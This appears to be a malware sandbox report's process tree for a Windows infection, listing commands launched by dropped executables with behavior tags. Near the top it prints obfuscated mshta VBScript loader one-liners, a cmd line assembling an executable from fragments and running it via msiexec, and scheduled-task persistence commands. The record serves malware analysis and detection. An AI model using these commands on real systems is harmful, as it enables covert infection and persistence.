C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\8EqV4eNR78bCYwfbybj8MsVz.exe" ) do taskkill -f -iM "%~NxM"11⤵
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "8EqV4eNR78bCYwfbybj8MsVz.exe"12⤵
- Kills process with taskkill
C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"9⤵
C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe"C:\Users\Admin\Pictures\Adobe Films\RhYYZNfjWIhndp3XngE_T5Lc.exe" -u10⤵
C:\Users\Admin\Pictures\Adobe Films\FVFTOIzhXOwuCYMlRx7WbAzn.exe"C:\Users\Admin\Pictures\Adobe Films\FVFTOIzhXOwuCYMlRx7WbAzn.exe"9⤵
- Loads dropped DLL
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"11⤵
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
C:\Users\Admin\Pictures\Adobe Films\Tr_Mw4Yk4p1Re1ouatYAWQUu.exe"C:\Users\Admin\Pictures\Adobe Films\Tr_Mw4Yk4p1Re1ouatYAWQUu.exe"7⤵
C:\Users\Admin\Pictures\Adobe Films\DvVQQq1XPMV9rCht2f5DtVr7.exe"C:\Users\Admin\Pictures\Adobe Films\DvVQQq1XPMV9rCht2f5DtVr7.exe"7⤵
C:\Users\Admin\Pictures\Adobe Films\VM2skHGFpeBDBysR6622fBC8.exe"C:\Users\Admin\Pictures\Adobe Films\VM2skHGFpeBDBysR6622fBC8.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
C:\Users\Admin\Pictures\Adobe Films\K0TibwmFldhZ549RofY1erc4.exe"C:\Users\Admin\Pictures\Adobe Films\K0TibwmFldhZ549RofY1erc4.exe"7⤵
- Executes dropped EXE
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 2368⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
C:\Users\Admin\Pictures\Adobe Films\Hj5Pq1vV39n8G1DTpop2wdl2.exe"C:\Users\Admin\Pictures\Adobe Films\Hj5Pq1vV39n8G1DTpop2wdl2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"7⤵
- Executes dropped EXE
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )8⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\nXZzPjm8z9HP4_SUYbwTPDKm.exe" ) do taskkill -im "%~NxK" -F9⤵
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP10⤵
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵
- Executes dropped EXE
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
C:\Windows\SysWOW64\taskkill.exetaskkill -im "nXZzPjm8z9HP4_SUYbwTPDKm.exe" -F10⤵
- Executes dropped EXE
- Kills process with taskkill
C:\Users\Admin\Pictures\Adobe Films\M35Lp9gfDfkC86gCoe6z36z0.exe"C:\Users\Admin\Pictures\Adobe Films\M35Lp9gfDfkC86gCoe6z36z0.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"7⤵
- Executes dropped EXE
C:\Users\Admin\AppData\Local\Temp\is-VE0ST.tmp\4kw4eKu9gndEHqJKFw6yErfF.tmp"C:\Users\Admin\AppData\Local\Temp\is-VE0ST.tmp\4kw4eKu9gndEHqJKFw6yErfF.tmp" /SL5="$6014C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\4kw4eKu9gndEHqJKFw6yErfF.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
C:\Users\Admin\AppData\Local\Temp\is-IFBHT.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-IFBHT.tmp\ShareFolder.exe" /S /UID=27109⤵
C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe"C:\Program Files\MSBuild\CPWRENHLDH\foldershare.exe" /VERYSILENT10⤵
C:\Users\Admin\AppData\Local\Temp\f6-2b359-4c1-2cb81-16e1ec8b1f461\Loraebaesura.exe"C:\Users\Admin\AppData\Local\Temp\f6-2b359-4c1-2cb81-16e1ec8b1f461\Loraebaesura.exe"10⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e611⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8f7d246f8,0x7ff8f7d24708,0x7ff8f7d2471812⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:212⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:812⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:312⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3728 /prefetch:112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5316 /prefetch:212⤵
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:812⤵
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5188 /prefetch:812⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2484 /prefetch:112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3464 /prefetch:112⤵
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6468 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4108 /prefetch:812⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6648 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1656 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7328 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7388 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,5000231633857498979,240127679884411341,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:112⤵
-
